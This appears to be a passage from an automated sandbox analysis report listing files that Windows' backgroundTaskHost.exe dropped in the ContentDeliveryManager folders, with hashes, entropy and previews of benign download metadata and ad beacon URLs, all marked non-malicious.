                                                                              SSDEEP:3:dx//J7v6WqcTK/6q8T763lllt/Z7xifk/ill3Vkttlmlnl:dxXJr6WqcTFq8T7yZ7x8h3
                                                                              MD5:ED28FB6E4A34F02ED0AFD755C9081BBC
                                                                              SHA1:DC180126C5167BE6F38342FF4620FCD76CE7DBF8
                                                                              SHA-256:F26DCC3BE1252290BFB34EE4D72A1FA504D69D03A8972CB8020547927919AC1C
                                                                              SHA-512:91BB8C5EBA5805F4C6A1A0CACEDD482AB2F9736495C9BE0BC0C84C9E7D9D20A6F475E754C252BE87CB4095FE10CFDC076606DC8AB896934049D1FD83C8AE0F69
                                                                              Malicious:false
                                                                              Preview:.\.......................................3...w...3...z3.+6...z..........+6...z..+6...z..`e..+6...z/.................C..w+6...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\1eb9023b-aa41-45a3-9b5d-5b71696cbaf9.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):276
                                                                              Entropy (8bit):3.409048610768343
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQif0cl:ZxMghwLtHSM1Sb9mSMXAvYfl
                                                                              MD5:65F5F3B91636716884C84C1F1D6C466B
                                                                              SHA1:886A03B0AA74D74782020C40F6B770EC440696A4
                                                                              SHA-256:4C71374A89D419BA05CC21234837A2863DD17E68C69C7BF37B3E7F0BFCFA34CB
                                                                              SHA-512:8D1DCC8D7BF82BD21EFDFCC563E80695755F2294E7CDF9FFFF4B9F0BF76A13655327AF32CE2AECF1DEC06DAC24316396AF862A5384BE252B94FD6BD71C61314E
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.z.3.4.m.?.v.e.r.=.2.5.1.e...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\26c0c66e-1fae-41bb-8965-9cfde6511223.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.422473556620063
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRKaMAo4:ZxMghwLtHSM1Sb9mSMXAvwR/M
                                                                              MD5:053A6748354C63633E9F064D374A3D64
                                                                              SHA1:F7392A988C29192C2DBB9192931C98C346A03B46
                                                                              SHA-256:1867022FBB28FC2A1F79ED84CFA93EFEE48C33EF120A7976E594BD497DA2ED3F
                                                                              SHA-512:175DB5E34D5D66ABCBA2DC76ADF44978A26A70A5CCEA46FF96D3EC85F4F34BA0B571785C3A912E87FD3D194F101339B2D0E988D4A611FFA91F9AC9204BDE5765
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.w.e.j.?.v.e.r.=.c.b.f.0...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\2e51cabf-3c62-4fa0-8e15-bf38a6aaae47.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.4331945997544016
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwR+aLNg:ZxMghwLtHSM1Sb9mSMXAvwR+ai
                                                                              MD5:525B1BA1772CFEE0BAE3DC8B3118E819
                                                                              SHA1:731557E8BA7563E9B04FD45DFE1E97E4B49080DB
                                                                              SHA-256:5A59D990336DC5A357E17ABF1CA3CF5200D212714769BC68EBE01639DB58C215
                                                                              SHA-512:1E86B1BD3E3AFDAB7FA0F57DA80EEF519976B1CDA586D8B90CB87FC247DD26AAACBA5669DE539E9817A7505DFB1BEE2457567A4909D36841F39CDD5D7ED7752E
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.X.J.7.Z.?.v.e.r.=.1.3.f.a...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6aa62ff1-6a40-4e34-903b-82855c0b2c58.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.3894363370336076
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRct:ZxMghwLtHSM1Sb9mSMXAvwR
                                                                              MD5:A27F678F172C642E24DE4740C5B2DBC3
                                                                              SHA1:36444729D96B371E3B182455FD5416A724875FF3
                                                                              SHA-256:BF27499FEA1EC1D167352764D5DE5CC87FCE82683C3F8CDB3E3A19086DEC5C82
                                                                              SHA-512:7846A476F6349EB719D781B6F529DCAAB21140067A54756A3C51E695B20E4C5FF74F5CA798181023D22860E9EA36C9E452EC003AB8A1B242033EB43F3EFA627F
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.l.T.B.?.v.e.r.=.2.a.9.4...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\9f255525-0065-434d-93ea-d945a3271900.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.422473556620063
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRKaMAo4:ZxMghwLtHSM1Sb9mSMXAvwR/M
                                                                              MD5:053A6748354C63633E9F064D374A3D64
                                                                              SHA1:F7392A988C29192C2DBB9192931C98C346A03B46
                                                                              SHA-256:1867022FBB28FC2A1F79ED84CFA93EFEE48C33EF120A7976E594BD497DA2ED3F
                                                                              SHA-512:175DB5E34D5D66ABCBA2DC76ADF44978A26A70A5CCEA46FF96D3EC85F4F34BA0B571785C3A912E87FD3D194F101339B2D0E988D4A611FFA91F9AC9204BDE5765
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.w.e.j.?.v.e.r.=.c.b.f.0...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\a2f8e179-fe51-444e-832b-074e239be3e6.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.4065402489118934
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRyjMr/J:ZxMghwLtHSM1Sb9mSMXAvwRyw
                                                                              MD5:0804BAA6AA2E6F3BFEE26C4878964D8F
                                                                              SHA1:364E417682227335558E0FC681CA63AAAB6EF547
                                                                              SHA-256:32A17854D220D2ADEF855727933DD22470E0A020E20CFC6A3EADA1DB587101E4
                                                                              SHA-512:7F774750853454E087B922329D4C8FD3E7B3FC75FF9D878AF3A0312F14B3F857AD8DC5EF71837BC5CAAC383DB3AF7051E6995697613F1039FA09380289B633C7
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.W.N.R.4.?.v.e.r.=.8.2.a.7...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\b13ed51d-37ae-4104-bd5c-dbe7e906955f.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.391792531393513
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRCAo1q1:ZxMghwLtHSM1Sb9mSMXAvwRC9+
                                                                              MD5:243F925C0ABBE732E09B0C2E29A638FD
                                                                              SHA1:FDB0600BA877727571437801BAF1B269E1591267
                                                                              SHA-256:E6EA053E76B0AAEA7FC55F05636DAD3C092C25C5730465655F0ED232B5D2AECC
                                                                              SHA-512:F24E9CF872FED828C9840D0A5D3905B83F30B6715556D55EE9F7294BBB04373EDFED7C9FCE91EBD277287B0198C47B50CF8B68A83420FC44D036E291821EFC65
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.F.w.5.F.?.v.e.r.=.6.f.6.a...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\baf71923-ac9e-420a-86e9-666354d5eab3.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.4179947346853985
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRtct/:ZxMghwLtHSM1Sb9mSMXAvwRGt/
                                                                              MD5:43327A6EC4655E2605BD848AC8080B10
                                                                              SHA1:51276390FDD68D8B69D029D9BAFDF9997ACB79C5
                                                                              SHA-256:71AB8FD7D98622E359F365BA254575446940872D50B54702788BCD7F9BFFD727
                                                                              SHA-512:59446BBE0E47D93FABD768C886DBBA365A61A576F83006000F0D8D3F93E741DC3AC2DC0E606AB7B81AFDA56E76A6CBA18E55DCBC0A0E211E5D06DE690E9B092B
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.F.d.p.q.?.v.e.r.=.5.5.b.1...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\bb6a075f-f8cc-4eb1-9664-c0a7d6856bb6.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.421963810396767
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRy4Uod:ZxMghwLtHSM1Sb9mSMXAvwRy
                                                                              MD5:C66BCF93ED9B2B486964DFDF8C3F8725
                                                                              SHA1:E8470CB4AA9AA86D45F7C4385B3108F02A01CDFF
                                                                              SHA-256:455B7863838C11F3A0B1C3AF86CAD3E0EC282893307EC0DB12B12A8501124678
                                                                              SHA-512:716FD3C99D8B83617378DBC142631F8BB7A603191A35EC4AC6A30B4025F441D521358C7AECE38F2A02421CA3A6C5A5B5745093C4DE960996C0FCBD69A838F344
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.W.I.E.t.?.v.e.r.=.b.6.5.3...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\cf9be2dc-8442-4a5f-9181-b5743484afb7.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.3894363370336076
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRct:ZxMghwLtHSM1Sb9mSMXAvwR
                                                                              MD5:A27F678F172C642E24DE4740C5B2DBC3
                                                                              SHA1:36444729D96B371E3B182455FD5416A724875FF3
                                                                              SHA-256:BF27499FEA1EC1D167352764D5DE5CC87FCE82683C3F8CDB3E3A19086DEC5C82
                                                                              SHA-512:7846A476F6349EB719D781B6F529DCAAB21140067A54756A3C51E695B20E4C5FF74F5CA798181023D22860E9EA36C9E452EC003AB8A1B242033EB43F3EFA627F
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.l.T.B.?.v.e.r.=.2.a.9.4...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d2744d4b-1d42-49a8-870f-1e1b9fcca2fe.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.414779436161726
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRGhtit/:ZxMghwLtHSM1Sb9mSMXAvwRG
                                                                              MD5:5DEFA2ED7476030EF2B061CC2497D806
                                                                              SHA1:AAC9CCE54C058128BC8F1B9C0B162A556D1C2664
                                                                              SHA-256:5F3096546980452D17067800A5F97C47B6763985DAD1026DE288065B9AEE2241
                                                                              SHA-512:0D840C0544B55E62F30BF3FD0836E0D282B2CFE6C322D3018D51E2784EDB496C4B5D6981B1683FE361D5ABD057B00295B7A2FC236BED21DB299E94432983889F
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.X.Q.V.g.?.v.e.r.=.a.c.2.7...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e29af581-707e-4cba-bf52-969a9da8381a.up_meta

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):276
                                                                              Entropy (8bit):3.411867361088877
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi/Eom:ZxMghwLtHSM1Sb9mSMXAvh
                                                                              MD5:4C2CFF2D31F47CFED62B158B615A9DB3
                                                                              SHA1:6B071121D4F0D8D243EA3A07E58098C3CAF6A495
                                                                              SHA-256:9F604F89356B479FC4FF6CFC8EC5816D00EA7A571D54997DC507BFC1DB2E622A
                                                                              SHA-512:7A0F1EBB1103F75DA0BE5483F305D487D470E15C0B400430C043805ED93AF3763894E425073C136AD09C63A281F2760714BC3C14DCDCB4191997CFE9393BBBC4
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.y.Z.s.w.?.v.e.r.=.e.e.4.9...........

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1658332418 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):3.494251376306208
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qeu01nAKmsy6AlS5CGQAffetXDdv5XY4ANJdlzYiL+5K5SaNy/NiFYlYl:Qeu01n+p65CGIz95INjzYiaU5SaNQsYm
                                                                              MD5:0DBEDE3B68F3ED30ABC129EEEEB122FB
                                                                              SHA1:1CAB11D94041C41909B5A073880E0BB76894844D
                                                                              SHA-256:3DDA5DF7B76DF231A735E49B4368C43E99BA133CDFC155A5FD1C0ACFBDA06B22
                                                                              SHA-512:BC594861367ADA6734E81787896EF7F4C716FF9854B90058D8A8E812877285CDA4D4A82986DE6743C03142E1264041F4D022F29319D954FA41DB00BBBDEE6F61
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".e.r.r.o.r.s.".:.[.{.".c.o.d.e.".:.2.0.4.0.,.".m.s.g.".:.".D.e.m.a.n.d. .s.o.u.r.c.e. .r.e.t.u.r.n.s. .e.r.r.o.r. .(.N.a.m.e.:. .G.N._.p.s.,. .E.r.r.o.r.:. .N.o. .e.l.i.g.i.b.l.e. .c.o.n.t.e.n.t...)...".}.].,.".r.e.f.r.e.s.h.t.i.m.e.".:.".2.0.2.2.-.0.7.-.2.0.T.1.9.:.5.3.:.3.8.".}.}.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1658332418.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):336
                                                                              Entropy (8bit):3.494251376306208
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qeu01nAKmsy6AlS5CGQAffetXDdv5XY4ANJdlzYiL+5K5SaNy/NiFYlYl:Qeu01n+p65CGIz95INjzYiaU5SaNQsYm
                                                                              MD5:0DBEDE3B68F3ED30ABC129EEEEB122FB
                                                                              SHA1:1CAB11D94041C41909B5A073880E0BB76894844D
                                                                              SHA-256:3DDA5DF7B76DF231A735E49B4368C43E99BA133CDFC155A5FD1C0ACFBDA06B22
                                                                              SHA-512:BC594861367ADA6734E81787896EF7F4C716FF9854B90058D8A8E812877285CDA4D4A82986DE6743C03142E1264041F4D022F29319D954FA41DB00BBBDEE6F61
                                                                              Malicious:false
                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".e.r.r.o.r.s.".:.[.{.".c.o.d.e.".:.2.0.4.0.,.".m.s.g.".:.".D.e.m.a.n.d. .s.o.u.r.c.e. .r.e.t.u.r.n.s. .e.r.r.o.r. .(.N.a.m.e.:. .G.N._.p.s.,. .E.r.r.o.r.:. .N.o. .e.l.i.g.i.b.l.e. .c.o.n.t.e.n.t...)...".}.].,.".r.e.f.r.e.s.h.t.i.m.e.".:.".2.0.2.2.-.0.7.-.2.0.T.1.9.:.5.3.:.3.8.".}.}.

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\eventbeacons.dat (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):10378
                                                                              Entropy (8bit):5.36129020728065
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZSCSB5k5gBlnBlS9vt9UmSmjhrhsnLUL/Lg2LZ2L4LBLiL+L3LB:ZDC+WLmnGTcdg23
                                                                              MD5:608783D73861EF319E60DBD7490EE82B
                                                                              SHA1:DFE87B3C755B6488D45B3464D9CE37738F542EE5
                                                                              SHA-256:A02CDFB36337DC507562ADC3E29AA22C98608CDF73A650E898469D820FA3C53E
                                                                              SHA-512:BA0AAC27FE7A0D9CF3E7A0EAAC2F44C307B57E6F3468A5F53FFCAF6C88372B49F34FCF7D6A4BB70F81F0EA6FC05C21DDBC398B987E18DD86172238610C46F7B1
                                                                              Malicious:false
                                                                              Preview:https://ris.api.iris.microsoft.com/v1/a/pin?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=83a4606a9c604ec59350c94231b7a4ff&time=20220720T155447Z..https://ris.api.iris.microsoft.com/v1/a/impression?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=83a4606a9c604ec59350c94231b7a4ff&time=20220720T155448Z..https://ris.api.iris.microsoft.com/v1/a/pin?pg=PC000P0FR5.0

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\eventbeacons.dat.~tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):10378
                                                                              Entropy (8bit):5.36129020728065
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZSCSB5k5gBlnBlS9vt9UmSmjhrhsnLUL/Lg2LZ2L4LBLiL+L3LB:ZDC+WLmnGTcdg23
                                                                              MD5:608783D73861EF319E60DBD7490EE82B
                                                                              SHA1:DFE87B3C755B6488D45B3464D9CE37738F542EE5
                                                                              SHA-256:A02CDFB36337DC507562ADC3E29AA22C98608CDF73A650E898469D820FA3C53E
                                                                              SHA-512:BA0AAC27FE7A0D9CF3E7A0EAAC2F44C307B57E6F3468A5F53FFCAF6C88372B49F34FCF7D6A4BB70F81F0EA6FC05C21DDBC398B987E18DD86172238610C46F7B1
                                                                              Malicious:false
                                                                              Preview:https://ris.api.iris.microsoft.com/v1/a/pin?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=83a4606a9c604ec59350c94231b7a4ff&time=20220720T155447Z..https://ris.api.iris.microsoft.com/v1/a/impression?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=dd1a8e84fd1343a98117c17a02a03b24&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=83a4606a9c604ec59350c94231b7a4ff&time=20220720T155448Z..https://ris.api.iris.microsoft.com/v1/a/pin?pg=PC000P0FR5.0

                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\imprbeacons.dat (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2891
                                                                              Entropy (8bit):5.225642587566377
                                                                              Encrypted:false
                                                                              SSDEEP:48:eSES2LHfaGujPqLILqfsBubT+TkS8ZU+8Levau6NPqLILqfsBubT+TkSl:YzGyE6z+e8iAyE6z+F
                                                                              MD5:42D4299132893EF8141AF34C24DBBB92
                                                                              SHA1:32FEC784B8ADADE06F008FA913C7255398BA88C9
                                                                              SHA-256:18F3543B099494441385E2B2D35A6DDDA21BFB6F0EEC9DA22214AE89C84D7AD1
                                                                              SHA-512:7E42ADF6640F9224E638A839416183362D6801CEB86C6DA9048AD7BBEA33BFB7347B922FF0EC0A3E40631C47C383025BB0D5D564D9F1A4D12EFBDC8FBC09D834
                                                                              Malicious:false
